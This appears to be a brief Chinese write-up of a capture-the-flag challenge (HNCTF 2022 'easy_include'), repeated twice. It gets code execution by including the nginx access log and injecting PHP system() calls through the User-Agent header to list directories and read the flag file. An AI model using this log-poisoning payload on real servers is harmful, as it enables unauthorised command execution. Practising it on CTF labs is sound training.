NSS [HNCTF 2022 WEEK2]easy_include
过滤好多,试试日志包含。
服务器是nginx
?file=/var/log/nginx/access.log
修改UA头为<?php system(‘ls’); ?>
修改UA头为<?php system(‘ls /’); ?>
修改UA头为<?php system('tac /ffflllaaaggg'); ?>
过滤好多,试试日志包含。
服务器是nginx
?file=/var/log/nginx/access.log
修改UA头为<?php system(‘ls’); ?>
修改UA头为<?php system(‘ls /’); ?>
修改UA头为<?php system('tac /ffflllaaaggg'); ?>